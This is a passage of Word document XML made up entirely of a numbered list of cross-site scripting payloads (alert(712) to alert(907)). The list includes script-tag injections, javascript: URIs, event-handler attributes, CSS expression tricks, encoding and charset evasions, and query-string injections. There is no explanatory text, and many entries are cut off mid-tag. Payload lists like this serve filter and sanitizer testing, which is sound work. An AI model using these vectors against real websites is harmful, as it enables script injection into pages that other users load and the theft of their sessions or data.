    <w:p w14:paraId="284263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alert(712))//";alert(712))//--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1600EC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&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(713))&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7007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SRC="javascript:alert(714);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EB24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SRC=javascript:alert(715)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA9D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SRC=JaVaScRiPt:alert(716)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA7ED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SRC=javascript:alert(717)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4640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SRC=`javascript:alert(718)`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31210B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onmouseover="alert(719)"&gt;xxs link&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE53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onmouseover=alert(720)&gt;xxs link&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA623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"""&gt;&lt;SCRIPT&gt;alert(721)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A8253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SRC=javascript:alert(722))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A98F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SRC=# onmouseover="alert(723)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F96C4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 onmouseover="alert(724)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BC0C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onmouseover="alert(725)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572CFF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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ascript:alert(726);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743FBA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SRC="jav&amp;#x09;ascript:alert(727);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5AB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SRC="jav&amp;#x0A;ascript:alert(728);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E622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SRC="jav&amp;#x0D;ascript:alert(729);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCF8A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'print "&lt;IMG SRC=java\0script:alert(730)&gt;";' &gt; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7405C7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 &amp;#14;  javascript:alert(731);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB267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onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(732)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033417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&lt;&lt;SCRIPT&gt;alert(733);//&lt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006CE2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SRC="javascript:alert(734)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39D9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\";alert(735);//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02548A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&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(736);&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00481B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SRC="javascript:alert(737);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6953F9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BACKGROUND="javascript:alert(738)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594F2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DYNSRC="javascript:alert(739)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2551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LOWSRC="javascript:alert(740)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A56F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&lt;STYLE&gt;li {list-style-image: url("javascript:alert(741)");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAA8A9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ONLOAD=alert(742)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229301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SRC="javascript:alert(743);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAB364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SIZE="&amp;{alert(744)}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4EF1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HREF="javascript:alert(745);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228737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&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(746)';&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3856955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STYLE="xss:expr/*XSS*/ession(alert(747))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CABA1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exp/*&lt;A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(748))'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6105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TYPE="text/javascript"&gt;alert(749);&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182834D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&lt;STYLE&gt;.XSS{background-image:url("javascript:alert(750)");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598095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type="text/css"&gt;BODY{background:url("javascript:alert(751)")}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350422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type="text/css"&gt;BODY{background:url("javascript:alert(752)")}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB6E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&lt;XSS STYLE="xss:expression(alert(753))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB8FA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¼script¾alert(754)¼/script¾</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C649C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CONTENT="0;url=javascript:alert(755);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC73B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 URL=http://;URL=javascript:alert(756);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6835A0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SRC="javascript:alert(757);"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C7F4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SRC=# onmouseover="alert(758)"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338BF3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SRC="javascript:alert(759);"&gt;&lt;/FRAMESET&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B03A9D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BACKGROUND="javascript:alert(760)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7696CD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BACKGROUND="javascript:alert(761)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124C388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url(javascript:alert(762))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1120B8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url(&amp;#1;javascript:alert(763))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F56E2E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expression(alert(764));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334CAF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HREF="javascript:alert(765);//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF124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echo('&lt;SCR)';echo('IPT&gt;alert(766)&lt;/SCRIPT&gt;'); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104FF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HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(767)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6E9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 &lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(768);+ADw-/SCRIPT+AD4-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F256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src=`%00`&amp;NewLine; onerror=alert(769)&amp;NewLine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF4B06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/*%00*/&gt;/*%00*/alert(770)/*%00*/&lt;/script /*%00*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920FD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&lt;iframe/src="data:text/html,&lt;svg &amp;#771771771;&amp;#7717710;load=alert(771)&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719E38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content="&amp;NewLine; 772 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(772)" http-equiv="refresh"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE8E3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&lt;form&gt;&lt;iframe &amp;#09;&amp;#7730;&amp;#773773; src="javascript&amp;#58;alert(773)"&amp;#773773;&amp;#7730;&amp;#09;;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A772C2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http://www.google&lt;script .com&gt;alert(774)&lt;/script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E491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^__^&gt;alert(775))&lt;/script ^__^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AEDF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&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(776)/**/&lt;/script &amp;#32; :-(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BF13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&amp;#00;&lt;/form&gt;&lt;input type&amp;#6777;"date" onfocus="alert(777)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F9F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href="javascript:void(0)" onmouseover=&amp;NewLine;javascript:alert(778)&amp;NewLine;&gt;X&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7FD0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~~~&gt;alert(779)&lt;/script ~~~&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486808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&lt;iframe/%00/ src=javaSCRIPT&amp;colon;alert(780)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2D05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&lt;%&lt;!--'%&gt;&lt;script&gt;alert(781);&lt;/script --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4694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 src="data:text/javascript,alert(782)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC55C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&lt;iframe/onreadystatechange=alert(783)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5081F5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&lt;svg/onload=alert(784)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B12B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type="text" value=`` &lt;div/onmouseover='alert(785)'&gt;X&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDE52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http://www.&lt;script&gt;alert(786)&lt;/script .com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1EF8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?&gt;alert(787)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E00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src=`xx:xx`onerror=alert(788)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700263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content="0;javascript&amp;colon;alert(789)"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BACC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&lt;script&gt;+-+-790-+-+alert(790)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675238F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&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#7910alert(791)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586121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itworksinallbrowsers&gt;/*&lt;script* */alert(792)&lt;/script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21557C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?itworksonchrome?\/onerror = alert(793)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678AC3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onlypossibleinopera:-)&gt; alert(794)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D86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x&gt; alert(795) &lt;/script 795=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D68AC9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&lt;div/onmouseover='alert(796)'&gt; style="x:"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B24B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&lt;--`&lt;img/src=` onerror=alert(797)&gt; --!&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A020A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style="position:absolute;top:0;left:0;width:79800%;height:79800%" onmouseover="prompt(798)" onclick="alert(798)"&gt;x&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E111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formaction=javascript&amp;colon;alert(799)&gt;CLICKME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF222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‘; alert(800);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5016FA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‘)alert(801);//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA764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&lt;ScRiPt&gt;alert(802)&lt;/sCriPt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB6EE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SRC=jAVasCrIPt:alert(803)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DBA3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SRC=”javascript:alert(804);”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350D71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SRC=javascript:alert(805)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD80A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SRC=javascript:alert(806)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2630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src=xss onerror=alert(807)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A256B7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src=`%00`&amp;NewLine; onerror=alert(808)&amp;NewLine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28992E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/*%00*/&gt;/*%00*/alert(809)/*%00*/&lt;/script /*%00*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179685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&lt;iframe/src="data:text/html,&lt;svg &amp;#810810810;&amp;#8108100;load=alert(810)&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A910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content="&amp;NewLine; 811 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(811)" http-equiv="refresh"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EA83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&lt;form&gt;&lt;iframe &amp;#09;&amp;#8120;&amp;#812812; src="javascript&amp;#58;alert(812)"&amp;#812812;&amp;#8120;&amp;#09;;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D1E30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http://www.google&lt;script .com&gt;alert(813)&lt;/script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FFFF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^__^&gt;alert(814))&lt;/script ^__^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF7D2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&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(815)/**/&lt;/script &amp;#32; :-(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2454EA5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&amp;#00;&lt;/form&gt;&lt;input type&amp;#6816;"date" onfocus="alert(816)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE45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href="javascript:void(0)" onmouseover=&amp;NewLine;javascript:alert(817)&amp;NewLine;&gt;X&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009DACD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~~~&gt;alert(818)&lt;/script ~~~&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFCAF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&lt;iframe/%00/ src=javaSCRIPT&amp;colon;alert(819)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E054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&lt;%&lt;!--'%&gt;&lt;script&gt;alert(820);&lt;/script --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242630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src="data:text/javascript,alert(821)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682297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&lt;iframe/onreadystatechange=alert(822)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D0F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&lt;svg/onload=alert(823)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A995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type="text" value=`` &lt;div/onmouseover='alert(824)'&gt;X&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D301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http://www.&lt;script&gt;alert(825)&lt;/script .com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE2C0A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?&gt;alert(826)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68056B1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src=`xx:xx`onerror=alert(827)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E9E9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content="0;javascript&amp;colon;alert(828)"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A660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&lt;script&gt;+-+-829-+-+alert(829)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D661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&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#8300alert(830)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626171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itworksinallbrowsers&gt;/*&lt;script* */alert(831)&lt;/script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3E5B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?itworksonchrome?\/onerror = alert(832)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2654AC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onlypossibleinopera:-)&gt; alert(833)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196F58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x&gt; alert(834) &lt;/script 834=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F97BA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&lt;div/onmouseover='alert(835)'&gt; style="x:"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE30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&lt;--`&lt;img/src=` onerror=alert(836)&gt; --!&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333239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style="xg-p:absolute;top:0;left:0;width:83700%;height:83700%" onmouseover="prompt(837)" onclick="alert(837)"&gt;x&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD82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formaction=javascript&amp;colon;alert(838)&gt;CLICKME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F520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‘;alert(839))//’;alert(839))//”;alert(839))//”;alert(839))//–&gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;alert(839))&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE818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“””&gt;&lt;SCRIPT&gt;alert(840)&lt;/SCRIPT&gt;”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB43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SRC=javascript:alert(841))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064E34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SRC=”jav ascript:alert(842);”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0141E4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SRC=”jav&amp;#x09;ascript:alert(843);”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EACAD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&lt;&lt;SCRIPT&gt;alert(844);//&lt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6573B7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%253cscript%253ealert(845)%253c/script%253e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364CC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“&gt;&lt;s”%2b”cript&gt;alert(846)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D073C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foo&lt;script&gt;alert(847)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A5CB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&lt;scr&lt;script&gt;ipt&gt;alert(848)&lt;/scr&lt;/script&gt;ipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788A7B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BACKGROUND=”javascript:alert(849)”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AFFF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ONLOAD=alert(850)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DFB4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TYPE=”IMAGE” SRC=”javascript:alert(851);”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E102D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SRC=”javascript:alert(852)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3B9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javascript:alert(853)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E9FE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src="javascript:alert(854);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D16E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src=javascript:alert(855)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E83C16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&lt;"';alert(856))//\';alert(856))//";alert(856))//\";alert(856))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(856))&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA02B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SRC="javascript:alert(857);"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB90F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&lt;&lt;SCRIPT&gt;alert(858);//&lt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C823E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&lt;"';alert(859))//\';alert(859))//";alert(859))//\";alert(859))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(859))&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9E24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';alert(860))//\';alert(860))//";alert(860))//\";alert(860))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(860))&lt;?/SCRIPT&gt;&amp;submit.x=27&amp;submit.y=9&amp;cmd=search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFCC2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&lt;script&gt;alert(861)&lt;/script&gt;&amp;safe=high&amp;cx=006665157904466893121:su_tzknyxug&amp;cof=FO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RID:9#510</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B671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&lt;script&gt;alert(862);&lt;/script&gt;&amp;search=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2601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0&amp;q=';alert(863))//\';alert%2?8863))//";alert(String.fromCharCode?(88,83,83))//\";alert(863)%?29//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83%?2C83))&lt;/SCRIPT&gt;&amp;submit-frmGoogleWeb=Web+Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561453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ONLOAD=alert(864)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D46B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onscroll=alert(865)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441BE7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formaction="javascript:alert(866)"&gt;lol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D819E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&lt;!--&lt;img src="--&gt;&lt;img src=x onerror=alert(867)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7098D1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&lt;![&gt;&lt;img src="]&gt;&lt;img src=x onerror=alert(868)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B976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&lt;style&gt;&lt;img src="&lt;/style&gt;&lt;img src=x onerror=alert(869)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3312D8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foo="&gt;&lt;script&gt;alert(870)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7518DC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foo="&gt;&lt;script&gt;alert(871)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D3FE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 foo="&gt;&lt;script&gt;alert(872)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D186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foo="&gt;&lt;x foo='?&gt;&lt;script&gt;alert(873)&lt;/script&gt;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4127AB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foo="[[[Inception]]"&gt;&lt;x foo="]foo&gt;&lt;script&gt;alert(874)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DFD1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 foo&gt;&lt;x foo="%&gt;&lt;script&gt;alert(875)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6FD7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xmlns="http://www.w3.org/2000/svg"&gt;LOL&lt;script&gt;alert(876)&lt;/script&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A91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&amp;lt;SCRIPT&amp;gt;alert(877)&amp;lt;/SCRIPT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D82B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\\";alert(878);//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFC74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&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(879);&amp;lt;/SCRIPT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7214CD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&amp;lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&amp;#058;alert(880);\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2329858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BACKGROUND=\"javascript&amp;#058;alert(881)\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF540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ONLOAD=alert(882)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA66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DYNSRC=\"javascript&amp;#058;alert(883)\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CFDD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LOWSRC=\"javascript&amp;#058;alert(884)\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3975D9F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&amp;lt;BGSOUND SRC=\"javascript&amp;#058;alert(885);\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7938350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&amp;lt;BR SIZE=\"&amp;{alert(886)}\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C56DB8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&amp;lt;LINK REL=\"stylesheet\" HREF=\"javascript&amp;#058;alert(887);\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31AF3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&amp;lt;STYLE&amp;gt;li {list-style-image&amp;#58; url(\"javascript&amp;#058;alert(888)\");}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1C19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žscriptualert(889)ž/scriptu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D07CD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HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&amp;#058;alert(890);\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F533C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HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&amp;#58;//;URL=javascript&amp;#058;alert(891);\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77400CF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&amp;lt;IFRAME SRC=\"javascript&amp;#058;alert(892);\"&amp;gt;&amp;lt;/IFRAME&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3EFE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&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=\"javascript&amp;#058;alert(893);\"&amp;gt;&amp;lt;/FRAMESET&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC113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&amp;lt;TABLE BACKGROUND=\"javascript&amp;#058;alert(894)\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30121A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&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=\"javascript&amp;#058;alert(895)\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41964A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STYLE=\"background-image&amp;#58; url(javascript&amp;#058;alert(896))\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC40A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STYLE=\"background-image&amp;#58; url(javascript&amp;#058;alert(897))\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C782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STYLE=\"width&amp;#58; expression(alert(898));\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5F8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&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript&amp;#58;alert(899)';&amp;lt;/STYLE&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573D50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STYLE=\"xss&amp;#58;expr/*XSS*/ession(alert(900))\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C132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&amp;lt;XSS STYLE=\"xss&amp;#58;expression(alert(901))\"&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFF6F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xss&amp;#58;ex&amp;#x2F;*XSS*//*/*/pression(alert(902))'&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA248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 TYPE=\"text/javascript\"&amp;gt;alert(903);&amp;lt;/STYLE&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B70BF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&amp;lt;STYLE&amp;gt;&amp;#46;XSS{background-image&amp;#58;url(\"javascript&amp;#058;alert(904)\");}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13539A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 type=\"text/css\"&amp;gt;BODY{background&amp;#58;url(\"javascript&amp;#058;alert(905)\")}&amp;lt;/STYLE&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D17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&amp;lt;SCRIPT&amp;gt;alert(906);&amp;lt;/SCRIPT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8C04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&amp;lt;BASE HREF=\"javascript&amp;#058;alert(907);//\"&amp;gt;</w:t>
      </w:r>
    </w:p>
